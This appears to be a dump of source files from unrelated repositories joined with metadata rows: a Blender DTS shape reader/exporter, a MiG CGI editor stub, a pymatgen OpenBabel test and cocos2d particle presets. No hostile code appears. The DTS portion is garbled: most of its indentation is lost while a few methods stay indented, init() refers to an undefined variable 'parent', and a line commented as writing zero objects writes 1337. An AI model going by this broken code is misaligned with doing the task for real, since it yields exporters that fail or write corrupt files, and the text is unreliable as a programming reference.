for cnt in range(0, numNodeTrans):
self.nodeTranslations.append(dstream.readPoint3F())
for cnt in range(0, numNodeRots):
self.nodeRotations.append(dstream.readQuat16())
dstream.readCheck()
# More node sequence data...scale
for cnt in range(0, numNodeUniformScales):
self.nodeUniformScales.append(dstream.readf32()) # F32
for cnt in range(0, numNodeAlignedScales):
self.nodeAlignedScales.append(dstream.readPoint3F())
for cnt in range(0, numNodeArbitraryScales):
self.nodeArbitraryScaleFactors.append(dstream.readPoint3F())
for cnt in range(0, numNodeArbitraryScales):
self.nodeArbitraryScaleRots.append(dstream.readQuat16())
dstream.readCheck()
# version 22 & 23 shapes accidentally had no ground transforms, and ground for
# earlier shapes is handled just above, so...
for cnt in range(0, numGroundFrames):
self.groundTranslations.append(dstream.readPoint3F())
for cnt in range(0, numGroundFrames):
self.groundRotations.append(dstream.readQuat16())
dstream.readCheck()
# Object States
for cnt in range(0, numObjectStates):
self.objectstates.append(dstream.readObjectState())
dstream.readCheck()
# Decal States
for cnt in range(0, numDecalStates):
self.decalstates.append(dstream.readDecalState())
dstream.readCheck()
# Frame Triggers
for cnt in range(0, numTriggers):
self.triggers.append(dstream.readTrigger())
dstream.readCheck()
# Details
for cnt in range(0, numDetails):
self.detaillevels.append(dstream.readDetailLevel())
dstream.readCheck()
# Meshes
# about to read in the meshes...first must allocate some scratch space
# ^^ We are not doing it in python though
Torque_Util.dump_writeln("Reading in Meshes...")
# Read in Meshes (sans skins)...
# Straight forward read one at a time
curObject, curDecal = 0, 0 # For tracking skipped meshes
for cnt in range(0, numMeshes):
skip = False # self.checkSkip(cnt, curObject, curDecal, skipDL)
mesh = DtsMesh()
mesh.mtype = dstream.readu32() # U32 Type of Mesh
Torque_Util.dump_writeln("Found Mesh")
if not skip:
Torque_Util.dump_writeln("Reading...")
val = mesh.read(dstream, self)
if (val != 1) and (mesh.mtype != 4):
Torque_Util.dump_writeErr("Error Reading Mesh!")
return None
self.meshes.append(mesh)
dstream.readCheck()
Torque_Util.dump_writeln("Finished Reading Meshes")
# Morphs
# if dstream.DTSVersion > 24:
# for cnt in range(0, numMorphs):
# self.morphs.append(dstream.readMorph())
# for cnt in range(0, numDefMorphs):
# self.morphs[cnt].initialValue = dstream.readf32()
# for cnt in range(0, numMorphSettings):
# self.morphSettings.append(dstream.readf32())
# dstream.readCheck()
# Read in names to our private string table...
for cnt in range(0, numNames):
self.sTable.addString(dstream.readStringt())
dstream.readCheck()
# allocate storage space for some arrays (filled in during Shape::init)...
# for cnt in range(0, numDetails):
# self.alphain.append(dstream.readf32())
# for cnt in range(0, numDetails):
# self.alphaout.append(dstream.readf32())
for cnt in range(0, numObjects):
self.mPreviousMerge.append(-1)
self.mExportMerge = dstream.DTSVersion >= 23;
    def getBounds(self):
        """Return the shape's bounding box."""
        return self.bounds
    def getRadius(self):
        """Return the shape's bounding-sphere radius."""
        return self.radius
    def getTubeRadius(self):
        """Return the shape's bounding-tube (XY) radius."""
        return self.tubeRadius
    def addName(self, s):
        """Add string *s* to the shape's string table and return its index."""
        return self.sTable.addString(s)
    def getName(self, idx):
        """Return the string-table entry stored at index *idx*."""
        return self.sTable.get(idx)
def calculateBounds(self):
if len(self.objects) == 0:
return
self.bounds.max = Vector(-10e30, -10e30, -10e30)
self.bounds.min = Vector(10e30, 10e30, 10e30)
# Iterate through the objects instead of the meshes
# so we can easily get the default transforms.
for ob in range(0, len(self.objects)):
object = self.objects[ob]
trans = Vector()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(object.node)
for j in range(0, object.numMeshes):
bounds2 = self.meshes[object.firstMesh + j].getBounds(trans, rot)
self.bounds.min[0] = min(self.bounds.min.x(), bounds2.min.x())
self.bounds.min[1] = min(self.bounds.min.y(), bounds2.min.y())
self.bounds.min[2] = min(self.bounds.min.z(), bounds2.min.z())
self.bounds.max[0] = max(self.bounds.max.x(), bounds2.max.x())
self.bounds.max[1] = max(self.bounds.max.y(), bounds2.max.y())
self.bounds.max[2] = max(self.bounds.max.z(), bounds2.max.z())
def calculateRadius(self):
maxRadius = float(0.0)
for i in range(0, len(self.objects)):
object = self.objects[i]
trans = Vector()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(object.node)
for j in range(0, object.numMeshes):
mesh = self.meshes[object.firstMesh + j]
meshRadius = mesh.getRadiusFrom(trans, rot, self.center)
if meshRadius > maxRadius: # stupid typo. Fixed!
maxRadius = meshRadius
self.radius = maxRadius
def calculateTubeRadius(self):
maxRadius = float(0.0)
for ob in self.objects:
trans = Vector2()
rot = Quaternion()
trans, rot = self.getNodeWorldPosRot(ob.node)
for j in range(0, ob.numMeshes):
mesh = self.meshes[ob.firstMesh + j]
meshRadius = mesh.getTubeRadiusFrom(trans, rot, self.center)
if meshRadius > maxRadius:
maxRadius = meshRadius
self.tubeRadius = maxRadius
    def calculateCenter(self):
        """Set ``self.center`` to the midpoint of the bounding box."""
        self.center = self.bounds.max.midpoint(self.bounds.min)
def setSmallestSize(self, i):
# Assumes detail levels are going from biggest -> smallest
if i < 1.0: i = 1.0
self.mSmallestVisibleSize = i
self.mSmallestVisibleDL = -1
foundSmallest = 9999
for det in range(0, len(self.detaillevels)):
# Select a detail level that is smaller than the current, yet bigger than the absolute smallest.
# Also make sure we don't select billboard details.
if (self.detaillevels[det].size >= self.mSmallestVisibleSize) and (
self.detaillevels[det].size < foundSmallest):
foundSmallest = self.detaillevels[det].size
self.mSmallestVisibleDL = det
# Fix any bad values
if self.mSmallestVisibleDL < 0: self.mSmallestVisibleDL = 0 # Must at least be 0
def calcSmallestSize(self):
# Assumes detail levels are going from biggest -> smallest
self.mSmallestVisibleDL = -1
self.mSmallestVisibleSize = 9999
for det in range(0, len(self.detaillevels)):
# Select a detail level that is smaller than the current, yet bigger than the absolute smallest.
# Also make sure we don't select billboard details.
if (self.detaillevels[det].size >= 0) and (self.detaillevels[det].size < self.mSmallestVisibleSize):
self.mSmallestVisibleDL = det
self.mSmallestVisibleSize = int(self.detaillevels[det].size)
# Fix any bad values
if self.mSmallestVisibleDL < 0: self.mSmallestVisibleDL = 0 # Must at least be 0
if self.mSmallestVisibleSize == 9999: self.mSmallestVisibleSize = 0
    def setCenter(self, p):
        """Set the shape's center point to *p*."""
        self.center = p
def getNodeWorldPosRot(self, n):
# Build total translation & rotation for this node
nidx = []
nidx.append(n)
nid = n
while ((self.nodes[nid].parent) >= 0):
nid = self.nodes[nid].parent
nidx.insert(0, nid)
trans = Vector(0, 0, 0)
rot = Quaternion(0, 0, 0, 1)
for nod in nidx:
trans += rot.apply(self.defaultTranslations[nod])
rot = self.defaultRotations[nod] * rot
return trans, rot
    def materialExists(self, name):
        """Return whether a material called *name* is in the material list."""
        return self.materials.materialExists(name)
    def printInfo(self):
        """Dump a human-readable summary of the shape's contents (counts,
        names, bounds) to the Torque_Util log."""
        Torque_Util.dump_writeln("Stats for Shape")
        Torque_Util.dump_writeln("***************")
        Torque_Util.dump_writeln("nodes : %d" % len(self.nodes))
        Torque_Util.dump_writeln("objects : %d" % len(self.objects))
        Torque_Util.dump_writeln("decals : %d" % len(self.decals))
        Torque_Util.dump_writeln("subshapes : %d" % len(self.subshapes))
        Torque_Util.dump_writeln("ifl materials : %d" % len(self.iflmaterials))
        Torque_Util.dump_writeln("node rotations : %d" % len(self.nodeRotations))
        Torque_Util.dump_writeln("node translations : %d" % len(self.nodeTranslations))
        Torque_Util.dump_writeln("node uniform scales : %d" % len(self.nodeUniformScales))
        Torque_Util.dump_writeln("node aligned scales : %d" % len(self.nodeAlignedScales))
        Torque_Util.dump_writeln("node abitrary scales : %d" % len(self.nodeAbitraryScaleFactors))
        Torque_Util.dump_writeln("morphs : %d" % len(self.morphs))
        Torque_Util.dump_writeln("ground frames : %d" % len(self.groundTranslations))
        Torque_Util.dump_writeln("morph frames: %d" % len(self.morphSettings))
        Torque_Util.dump_writeln("object states : %d" % len(self.objectstates))
        Torque_Util.dump_writeln("decal states : %d" % len(self.decalstates))
        Torque_Util.dump_writeln("triggers : %d" % len(self.triggers))
        Torque_Util.dump_writeln("detail levels : %d" % len(self.detaillevels))
        Torque_Util.dump_writeln("meshes : %d" % len(self.meshes))
        Torque_Util.dump_writeln("names : %d" % len(self.sTable.strings))
        for n in self.sTable.strings:
            Torque_Util.dump_writeln(" %s" % n.tostring())
        Torque_Util.dump_writeln("smallest visible size : %d" % self.mSmallestVisibleSize)
        Torque_Util.dump_writeln("smallest visible DL : %d" % self.mSmallestVisibleDL)
        Torque_Util.dump_writeln("radius : %f" % self.radius)
        Torque_Util.dump_writeln("tube radius : %f" % self.tubeRadius)
        Torque_Util.dump_writeln("center : (%f %f %f)" % (self.center[0], self.center[1], self.center[2]))
        Torque_Util.dump_writeln("bounds : (%f %f %f) (%f %f %f)" % (
            self.bounds.min[0], self.bounds.min[1], self.bounds.min[2], self.bounds.max[0], self.bounds.max[1],
            self.bounds.max[2]))
        Torque_Util.dump_writeln("End Stats")
    def clearDynamicData(self):
        """Hook for resetting runtime-derived state; currently a no-op."""
        pass
def init(self):
self.clearDynamicData()
# Clear any bogus node info
for i in self.nodes:
i.firstObject = i.firstChild = i.nextSibling = -1
# Fill in node info :
for i in range(0, len(self.nodes)):
parentId = self.nodes[i].parent
if parent >= 0:
if self.nodes[parentId].firstChild < 0:
self.nodes[parentId].firstChild = i
else:
child = self.nodes[parentId].firstChild
while self.nodes[child].nextSibling >= 0:
child = self.nodes[child].nextSibling
self.nodes[child].nextSibling = i
# Fill in object info :
for i in range(0, len(self.objects)):
self.objects[i].sibling = -1
self.objects[i].firstDecal = -1
nodeIndex = self.objects[i].node
if nodeIndex >= 0:
if self.nodes[nodeIndex].firstObject < 0:
self.nodes[nodeIndex].firstObject = i
else:
objectIndex = self.nodes[nodeIndex].firstObject
while self.objects[objectIndex].nextSibling >= 0:
objectIndex = self.objects[objectIndex].nextSibling
self.objects[objectIndex].sibling = i
# Fill in decal info :
for i in range(0, len(self.decals)):
self.decals[i].sibling = -1
objectIndex = self.decals[i].object
if self.objects[objectIndex].firstDecal < 0: # must set objects decal to this
self.objects[objectIndex].firstDecal = i
else:
decalIndex = self.objects[objectIndex].firstDecal
while self.decals[decalIndex].sibling >= 0:
decalIndex = self.decals[decalIndex].sibling
self.decals[decalIndex].sibling = i
# Fill in sequence data :
mFlags = 0
'''
for in in range(0, len(self.sequences)):
if not self.sequences[i].animatesScale:
continue
curVal = mFlags & AnyScale
newVal = self.sequences[i].flags & AnyScale
mFlags &= ~(AnyScale)
mFlags |= max(curVal, NewVal)
'''
for i in range(0, len(self.detaillevels)):
if self.detaillevels[i].size < 0:
print("TODO 1") # Not implemented creation of these lists yet!!
# self.alphaIn[i] = 0.0
# self.alphaOut[i] = 0.0
elif i + 1 == len(self.detaillevels) or self.detaillevels[i + 1].size < 0:
print("TODO 2")
# self.alphaIn[i] = 0.0
# self.alphaOut[i] = smAlphaOutLastDetail
else:
if self.detaillevels[i + 1].subshape < 0:
print("TODO 3")
# billboard detail special
# self.alphaIn[i] = smAlphaInBillboard
# self.alphaOut[i] = smAlphaOutBillboard
else:
print("TODO 4")
# Normal detail next
# self.alphaIn[i] = smAlphaInDefault
# self.alphaOut[i] = smAlphaOutDefault
# Fixes up subshape # and object detail #
for i in range(0, self.mSmallestVisibleDL - 1):
if i < self.smNumSkipLoadDetails:
# detail levels renders when pixel size > cap
# zap meshes + decals associated with it and
# use next detail level instead
ss = self.detaillevels[i].subshape
od = self.detaillevels[i].objectDetail
if ss == self.detaillevels[i + 1].subshape and od == self.detaillevels[i + 1].objectDetail:
# already done? (init supposedly called multiple times??)
continue
self.detaillevels[i].subshape = self.detaillevels[i + 1].subshape
self.detaillevels[i].objectDetail = self.detaillevels[i + 1].objectDetail
# Calculates polycount on detail levels
for i in range(0, len(self.detaillevels)):
count = 0
ss = self.detaillevels[i].subshape
od = self.detaillevels[i].objectDetail
if ss < 0:
# billboard
count += 2
continue
start = self.subshapes[ss].firstObject
end = start + self.subshapes[ss].numObjects
for j in range(start, end):
object = self.objects[j]
if od < object.numMeshes:
mesh = self.meshes[object.firstMesh + od]
count += mesh.getPolyCount()
self.detaillevels[i].polyCount = count
# Init the collision accelerator array << Probably don't need this for what we're doing!!
# for dca in range(0, len(self.detailCollisionAccelerators):
# print "BOO"
# Here we calculate a merge buffer size... probably don't need this anyway
mMergeBufferSize = 0
for i in range(0, len(self.meshes)):
object = self.objects[i]
maxSize = 0
for dl in range(0, object.numMeshes):
mesh = self.meshes[object.firstMesh + dl]
maxSize = getMax(maxSize, len(mesh.mindices)) # mindices = MERGE indices?
mMergeBufferSize += maxSize
self.initMaterialList()
# Now that was exciting
    def initMaterialList(self):
        """Placeholder: would loop through subshapes finding translucent
        objects; currently a no-op."""
        pass
# Following functions for DSQ Support
def writeDSQSequence(self, fs, sequence, version):
fs.write(struct.pack('<i', version)) # S32, version 24 currently
nodes_used = sequence.getNodes()
node_rots = sequence.countNodes(0)
node_locs = sequence.countNodes(1)
node_scales = sequence.countNodes(2)
new_rot_matters = []
new_loc_matters = []
new_scale_matters = []
# Write node names
# -- this is how we will map imported sequence nodes to shape nodes
# Do not write node names not affected by animation
fs.write(struct.pack('<i', len(nodes_used)))
cur_writ = 0
for n in nodes_used:
# Write the node, since its a part of the sequence
if self.nodes[n].name != -1:
fs.write(struct.pack('<i', len(self.sTable.strings[self.nodes[n].name])))
self.sTable.strings[self.nodes[n].name].tofile(fs)
else:
fs.write(struct.pack('<i', 0)) # No length, -1 index!
# Warning : do not name more than 1 node -1 index!
# Add to the new matters list
new_rot_matters.append(sequence.matters_rotation[n])
new_loc_matters.append(sequence.matters_translation[n])
new_scale_matters.append(sequence.matters_scale[n])
cur_writ += 1
if len(nodes_used) != sequence.countNodes():
# This should never happen
Torque_Util.dump_writeWarning(
"Warning : node list size mismatch! Expecting %d nodes, but got %d. Sequence may not load." % (
sequence.countNodes(), len(nodes_used)))
sequence.matters_rotation = new_rot_matters
sequence.matters_translation = new_loc_matters
sequence.matters_scale = new_scale_matters
# legacy write -- write zero objects, don't pretend to support object export anymore
fs.write(struct.pack('<i', 1337)) # S32
# On import, we will need to adjust keyframe data based on number of
# nodes/objects in this shape...number of nodes can be inferred from
# above, but number of objects cannot be. Write that quantity here:
fs.write(struct.pack('<i', len(self.objects))) # S32
# Calculate bases
# (All need to start from 0)
if sequence.baseRotation < 0:
baseRotation = 0
else:
baseRotation = sequence.baseRotation
if sequence.baseTranslation < 0:
baseTranslation = 0
else:
baseTranslation = sequence.baseTranslation
if sequence.baseScale < 0:
baseScale = 0
else:
baseScale = sequence.baseScale
if sequence.firstGroundFrame < 0:
baseGround = 0
else:
baseGround = sequence.firstGroundFrame
baseTrigger = sequence.firstTrigger
# Write node states -- skip default node states
fs.write(struct.pack('<i', node_rots * sequence.numKeyFrames)) # S32
for n in self.nodeRotations[baseRotation:baseRotation + (node_rots * sequence.numKeyFrames)]:
q16 = n.toQuat16() # << Remember its Quat16's!
# Check if we are out of bounds
if q16.x > 32767:
q16.x = 32767
elif q16.x < -32768:
q16.x = -32768
elif q16.y > 32767:
q16.y = 32767
elif q16.y < -32768:
q16.y = -32768
elif q16.z > 32767:
q16.z = 32767
elif q16.z < -32768:
q16.z = -32768
elif q16.w > 32767:
q16.w = 32767
elif q16.w < -32768:
q16.w = -32768
fs.write(struct.pack('<h', q16[0])) # F32 x
fs.write(struct.pack('<h', q16[1])) # F32 y
fs.write(struct.pack('<h', q16[2])) # F32 z
fs.write(struct.pack('<h', q16[3])) # F32 w
fs.write(struct.pack('<i', node_locs * sequence.numKeyFrames)) # S32
for n in self.nodeTranslations[baseTranslation:baseTranslation + (node_locs * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # F32 x
fs.write(struct.pack('<f', n[1])) # F32 y
fs.write(struct.pack('<f', n[2])) # F32 z
if sequence.flags & Sequence.UniformScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeUniformScales[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', self.nodeUniformScales))
else:
fs.write(struct.pack('<i', 0))
if sequence.flags & Sequence.AlignedScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeAlignedScales[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
else:
fs.write(struct.pack('<i', 0))
if sequence.flags & Sequence.ArbitraryScale:
fs.write(struct.pack('<i', node_scales * sequence.numKeyFrames)) # S32
for n in self.nodeAbitraryScaleRots[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
q16 = Quat16(n)
fs.write(struct.pack('<h', q16[0])) # X
fs.write(struct.pack('<h', q16[1])) # Y
fs.write(struct.pack('<h', q16[2])) # Z
fs.write(struct.pack('<h', q16[3])) # W
for n in self.nodeAbitraryScaleFactors[baseScale:baseScale + (node_scales * sequence.numKeyFrames)]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
else:
fs.write(struct.pack('<i', 0))
fs.write(struct.pack('<i', sequence.numGroundFrames)) # S32
for n in self.groundTranslations[baseGround:baseGround + sequence.numGroundFrames]:
fs.write(struct.pack('<f', n[0])) # X
fs.write(struct.pack('<f', n[1])) # Y
fs.write(struct.pack('<f', n[2])) # Z
for n in self.groundRotations[baseGround:baseGround + sequence.numGroundFrames]:
q16 = Quat16(n)
fs.write(struct.pack('<h', q16[0])) # X
fs.write(struct.pack('<h', q16[1])) # Y
fs.write(struct.pack('<h', q16[2])) # Z
fs.write(struct.pack('<h', q16[3])) # W
# write object states -- legacy..no object states
fs.write(struct.pack('<i', 0))
# Also set the bases accordingly
if sequence.baseRotation > 0: sequence.baseRotation = 0
if sequence.baseTranslation > 0: sequence.baseTranslation = 0
if sequence.baseScale > 0: sequence.baseScale = 0
if sequence.firstGroundFrame > 0: sequence.firstGroundFrame = 0
if sequence.firstTrigger > 0: sequence.firstTrigger = 0
# Write Sequence
fs.write(struct.pack('<i', 1))
if sequence.nameIndex != -1:
fs.write(struct.pack('<i', len(self.sTable.strings[sequence.nameIndex])))
self.sTable.strings[sequence.nameIndex].tofile(fs)
else:
fs.write(0x00)
# Now write the sequence itself
sequence.write(fs, version, True)
# write out all the triggers...
if baseTrigger > -1:
fs.write(struct.pack('<i', sequence.numTriggers))
for t in self.triggers[baseTrigger:baseTrigger + sequence.numTriggers]:
fs.write(struct.pack('<I', t.state)) # U32
fs.write(struct.pack('<f', t.pos)) # F32
else:
fs.write(struct.pack('<i', 0)) # S32
    def readDSQSequences(self):
        """Stub: DSQ import is not needed by the exporter, so this only
        logs a reminder."""
        Torque_Util.dump_writeln("TODO: Shape.readDSQSequences")
        # We do not need to implement this for the exporter
|
pchan126/Blender_DTS_30
|
DTSPython/Dts_Shape.py
|
Python
|
mit
| 52,893
|
[
"exciting"
] |
728f1caf6e93f8e8137e1ac01b0d148cf022586f1338242259108fad3b6f83f9
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# editor - [insert a few words of module description on this line]
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
# CGI entry point: all request handling is delegated to the shared
# editor functionality module via the common cgi script stub.
import cgi
import cgitb
cgitb.enable()  # render tracebacks as HTML for easier debugging
from shared.functionality.editor import main
from shared.cgiscriptstub import run_cgi_script
run_cgi_script(main)
|
heromod/migrid
|
mig/cgi-bin/editor.py
|
Python
|
gpl-2.0
| 1,100
|
[
"Brian"
] |
530791734d4622a3cce400fbfacfe7a5e02887de1bfda3695c48d66d9eb0dfb6
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
Created on Apr 28, 2012
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Apr 28, 2012"
import unittest
import os
from pymatgen.core.structure import Molecule
from pymatgen.io.xyz import XYZ
from pymatgen.io.babel import BabelMolAdaptor
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
"test_files", "molecules")
try:
    import openbabel as ob
    import pybel as pb
except ImportError:
    # OpenBabel is optional: record its absence so the skipIf decorator
    # below can skip the tests instead of erroring at import time.
    pb = None
    ob = None
@unittest.skipIf(not (pb and ob), "OpenBabel not present. Skipping...")
class BabelMolAdaptorTest(unittest.TestCase):
    """Round-trip tests for the pymatgen <-> OpenBabel molecule adaptor."""

    def setUp(self):
        # Methane: carbon at the origin, four tetrahedral hydrogens.
        positions = [
            [0.000000, 0.000000, 0.000000],
            [0.000000, 0.000000, 1.089000],
            [1.026719, 0.000000, -0.363000],
            [-0.513360, -0.889165, -0.363000],
            [-0.513360, 0.889165, -0.363000],
        ]
        self.mol = Molecule(["C", "H", "H", "H", "H"], positions)

    def test_init(self):
        adapter = BabelMolAdaptor(self.mol)
        self.assertEqual(adapter.openbabel_mol.NumAtoms(), 5)
        # Feed the OpenBabel molecule back through the adaptor.
        roundtrip = BabelMolAdaptor(adapter.openbabel_mol)
        self.assertEqual(roundtrip.pymatgen_mol.formula, "H4 C1")

    def test_from_file(self):
        pdb_path = os.path.join(test_dir, "Ethane_e.pdb")
        molecule = BabelMolAdaptor.from_file(pdb_path, "pdb").pymatgen_mol
        self.assertEqual(molecule.formula, "H6 C2")

    def test_from_string(self):
        xyz_text = str(XYZ(self.mol))
        molecule = BabelMolAdaptor.from_string(xyz_text, "xyz").pymatgen_mol
        self.assertEqual(molecule.formula, "H4 C1")

    def test_localopt(self):
        # Perturb one C-H bond, then let OpenBabel relax the geometry.
        self.mol[1] = "H", [0, 0, 1.05]
        adapter = BabelMolAdaptor(self.mol)
        adapter.localopt()
        optimized = adapter.pymatgen_mol
        for site in optimized[1:]:
            self.assertAlmostEqual(site.distance(optimized[0]), 1.09216, 2)
# Allow running this test module directly.
if __name__ == "__main__":
    unittest.main()
|
sonium0/pymatgen
|
pymatgen/io/tests/test_babel.py
|
Python
|
mit
| 2,260
|
[
"Pybel",
"pymatgen"
] |
9778c08bec9c7422907c91bb7bc923b1fec99f3eef3d519e6bad2922d38d9599
|
# ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Pre-defined Particle Systems'''
__all__ = ['Fireworks', 'Spiral', 'Meteor', 'Sun', 'Fire', 'Galaxy', 'Flower', 'Explosion', 'Smoke']
from particle import ParticleSystem, Color
from euclid import Point2
class Fireworks( ParticleSystem ):
    """Continuous upward spray of particles pulled back down by gravity."""

    duration = -1                   # -1: emit forever
    total_particles = 3000

    # Emitter geometry and kinematics
    gravity = Point2(0,-90)
    angle = 90
    angle_var = 20
    radial_accel = 0
    radial_accel_var = 0
    speed = 180
    speed_var = 50
    pos_var = Point2(0,0)           # emit from a single point

    # Particle lifetime; the rate keeps the pool fully used
    life = 3.5
    life_var = 1
    emission_rate = total_particles / life

    # Appearance
    start_color = Color(0.5,0.5,0.5,1.0)
    start_color_var = Color(0.5, 0.5, 0.5, 1.0)
    end_color = Color(0.1,0.1,0.1,0.2)
    end_color_var = Color(0.1,0.1,0.1,0.2)
    size = 8.0                      # pixels
    size_var = 2.0
    blend_additive = False
    color_modulate = True
class Explosion( ParticleSystem ):
    """Single short burst: all particles emitted in a 0.1 s window."""

    duration = 0.1                  # short one-shot burst
    total_particles = 700

    # Emitter geometry and kinematics
    gravity = Point2(0,-90)
    angle = 90.0
    angle_var = 360.0               # radiate in every direction
    radial_accel = 0
    radial_accel_var = 0
    speed = 70.0
    speed_var = 40.0
    pos_var = Point2(0,0)

    # Particle lifetime; note the rate is tied to duration, not life,
    # so the whole pool fires during the brief emission window
    life = 5.0
    life_var = 2.0
    emission_rate = total_particles / duration

    # Appearance
    start_color = Color(0.7, 0.2, 0.1, 1.0)
    start_color_var = Color(0.5, 0.5, 0.5, 0.0)
    end_color = Color(0.5, 0.5, 0.5, 0.0)
    end_color_var = Color(0.5, 0.5, 0.5, 0.0)
    size = 15.0                     # pixels
    size_var = 10.0
    blend_additive = False
    color_modulate = True
class Fire( ParticleSystem ):
    """Wide, slow flame rising from an extended emitter area."""

    duration = -1                   # -1: emit forever
    total_particles = 250

    # Emitter geometry and kinematics
    gravity = Point2(0,0)
    angle = 90.0
    angle_var = 10.0                # narrow upward cone
    radial_accel = 0
    radial_accel_var = 0
    speed = 60.0
    speed_var = 20.0
    pos_var = Point2(40, 20)        # spread the source over an area

    # Particle lifetime
    life = 3.0
    life_var = 0.25
    emission_rate = total_particles / life

    # Appearance
    start_color = Color(0.76, 0.25, 0.12, 1.0)
    start_color_var = Color(0.0, 0.0, 0.0, 0.0)
    end_color = Color(0.0, 0.0, 0.0, 1.0)
    end_color_var = Color(0.0, 0.0, 0.0, 0.0)
    size = 100.0                    # pixels
    size_var = 10.0
    blend_additive = True
    color_modulate = True
class Flower( ParticleSystem ):
    """Petal-like pattern: outward spray curved by inward radial pull."""

    duration = -1                   # -1: emit forever
    total_particles = 500

    # Emitter geometry and kinematics
    gravity = Point2( 0, 0)
    angle = 90.0
    angle_var = 360.0               # radiate in every direction
    speed = 80.0
    speed_var = 10.0
    radial_accel = -60              # negative: attract back toward center
    radial_accel_var = 0
    tangential_accel = 15.0         # adds a slight swirl
    tangential_accel_var = 0.0
    pos_var = Point2(0,0)

    # Particle lifetime
    life = 4.0
    life_var = 1.0
    emission_rate = total_particles / life

    # Appearance
    start_color = Color(0.5, 0.5, 0.5, 1.0)
    start_color_var = Color(0.5, 0.5, 0.5, 0.0)
    end_color = Color(0.0, 0.0, 0.0, 1.0)
    end_color_var = Color(0.0, 0.0, 0.0, 0.0)
    size = 30.0                     # pixels
    size_var = 0.0
    blend_additive = True
    color_modulate = True
class Sun( ParticleSystem ):
    """Glowing ball: short-lived particles drifting slowly outward."""

    duration = -1                   # -1: emit forever
    total_particles = 350

    # Emitter geometry and kinematics
    gravity = Point2(0,0)
    angle = 90.0
    angle_var = 360.0               # radiate in every direction
    speed = 20.0
    speed_var = 5.0
    radial_accel = 0
    radial_accel_var = 0
    tangential_accel = 0.0
    tangential_accel_var = 0.0
    pos_var = Point2(0, 0)

    # Particle lifetime
    life = 1.0
    life_var = 0.5
    emission_rate = total_particles / life

    # Appearance
    start_color = Color(0.75, 0.25, 0.12, 1.0)
    start_color_var = Color(0.0, 0.0, 0.0, 0.0)
    end_color = Color(0.0, 0.0, 0.0, 0.0)
    end_color_var = Color(0.0, 0.0, 0.0, 0.0)
    size = 40.0                     # pixels
    size_var = 0.0
    blend_additive = True
    color_modulate = True
class Spiral( ParticleSystem ):
    """Spiral arms: strong inward pull plus tangential acceleration."""

    duration = -1                   # -1: emit forever
    total_particles = 500

    # Emitter geometry and kinematics
    gravity = Point2(0,0)
    angle = 90.0
    angle_var = 0.0                 # all launched straight up
    speed = 150.0
    speed_var = 0.0
    radial_accel = -380             # strong attraction toward center
    radial_accel_var = 0
    tangential_accel = 45.0         # bends trajectories into a spiral
    tangential_accel_var = 0.0
    pos_var = Point2(0,0)

    # Particle lifetime
    life = 12.0
    life_var = 0.0
    emission_rate = total_particles / life

    # Appearance
    start_color = Color(0.5, 0.5, 0.5, 1.0)
    start_color_var = Color(0.5, 0.5, 0.5, 0.0)
    end_color = Color(0.5, 0.5, 0.5, 1.0)
